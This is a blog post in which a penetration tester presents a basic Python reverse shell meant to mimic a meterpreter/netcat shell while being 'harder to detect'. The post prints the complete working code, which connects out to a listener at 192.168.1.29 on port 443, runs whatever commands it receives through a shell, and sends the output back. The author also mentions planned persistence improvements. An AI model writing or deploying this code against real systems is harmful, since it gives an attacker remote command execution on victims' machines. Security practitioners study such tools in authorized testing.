Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
This week I decided to put together a basic Python reverse shell. The main purpose of this was to act like a meterpreter/nc reverse shell while being more customizable and (hopefully) harder to detect.
While this is just a simple reverse shell for a single client (for example: a netcat listener), it demonstrates how easy it is for Python to create a connection using sockets and subprocess. Additionally, it gives me something to build on in the future.
To start, the code is as follows:
import socket import subprocess import sys RHOST = "192.168.1.29" RPORT = 443 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((RHOST, RPORT)) while True: data = s.recv(1024) conn = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) STDOUT, STDERR = conn.communicate() s.send(STDOUT) s.close()
And here is the client in action!
There are some tweaks that could be made for better persistence and error handling, but those are not necessary for the current basic operation.
That said, this is a great start for a reverse shell, and something I needed to add to my toolbox anyway.
The next major steps for this shell are as follows:
The code and updates can be found in my GitHub repository.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.